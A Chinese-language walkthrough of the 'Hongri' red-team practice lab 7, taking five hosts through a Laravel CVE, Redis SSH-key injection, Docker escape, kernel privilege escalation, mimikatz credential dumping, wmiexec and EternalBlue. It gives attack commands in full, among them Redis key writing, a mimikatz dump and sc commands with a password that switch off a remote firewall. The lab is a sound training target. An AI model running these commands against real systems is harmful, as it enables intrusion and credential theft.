红日靶场7-WP-MS17-010-WMI-laravel-docker-exp #
架构如下记得关闭win7防火墙
工具
fscan
CVE-2021-3129.py
redis-cli or Another Redis Desktop Manager
C2平台用于socks代理
linux内核提权C脚本 CVE-2021-3493/exploit.c at main · briskets/CVE-2021-3493
Proxifier代理
mimikatz 密码
impacket-0.11.0-wmiexec 工具
方程式工具包图形界面版V0.42
第一台主机 #
使用FSCAN扫描是laravel框架使用CVE
拿下一个后门
同时他这里扫描还有一个redis我们试试未授权发现可以写入我们的公钥进去 直接SSH访问拿下第一台主机shell
这里set read-only no是让他可写
config set dir /root/.ssh/
config set dbfilename authorized_keys
# 保存key的时候加上两个`\n`是为了避免和Redis里其他缓存数据混合
config set slave-read-only no
set key "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChJ31EeTjZIw5tz/8b2Ma6XyrjI6+FSUfbnWRF7HA6/pMtgTbZGPhKXRzdigHq2NY40KSz7xpeDvpZEbdCjpCiimXfwgALaZpI/GxftyA4C9yWoSQxR7jdK8dWAurA9rnoPnwrOO8F14rg2P2vknrtR70eIklAwbuDvJ8Aq9Ai5tMPaiOx2uJAYRWYRgOd/jP4WhZ8nF88N+E963xFf/Bf37AMV4SVujvasubsmM96t7fOqEBgzyK+xTClVqhzzGKhcr5AfYDvemDnffXEC3Ff+cdkXpW8HhX8FrK6D2HzwpOIN/8hypJNkGssXOZ9E4rTWWoY84VtPvceYMUI7xV44VskmZMLYrBAxfPDzEJV/HHKX1xQXwsHg7WiSRntApPS3BfeMr8ZqJTSBqoTVAnoMAuClPy1Vm1c+mlzvjlCbBBLfLEWNvuslzR9rQMFpMwLN3PoBhyGZ5+gv94QPbicLhNuLdU10KD5dHLtWUoWIGOu2RqtcjjKul+fT62BPy8= root@kali\n\n"
save
登录成功
可以看它使用了nginx代理了内网的52.20的8000端口也就是说这个端口有这个服务
我们把上面那个shell弹过来因为是内网可以弹
可以发现我们是在docker中
这里root有一个权限
经典环境变量劫持提权
第二台主机 #
挂载逃逸
可以发现我们现在的目录就是在docker外这是源自于他设置docker设置了我们可以挂载并且修改后同步到上面不然不行
我们写入公钥到ubuntu用户
支持拿下两台主机
linux内核提权
第三台主机-OAweb2 #
我们在主机二上面放fscan
发现了内网有一个OA系统
我们在第一台DMZ主机加socks这里C2平台你用MSF CS都可以
windows使用Proxifier代理
访问时候代理触发证明配置正确
使用OA工具扫描获得一个SHELL
蚁剑连接
放入后门我们连接
我们正向socks连接获得三台主机权限
第四台主机 #
这里我环境很多问题IP第一台变了181变了184
我们上传mimikatz用户黄金票据扫描密码
mimikatz.x64.exe "sekurlsa::logonpasswords full" exit > password.txt
这里我们在windows上面加一个socks代理 创建一个socks池用户全面穿透内网到达92网段
使用wmiexec协议获取DC
远程下载OA上面的8067后门我们可以主动连接
拿下第四台
第五台 #
FSCAN扫描
发现了永恒之蓝
工具
远程下载后门正面连接拿下第五台
关闭防火墙
net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall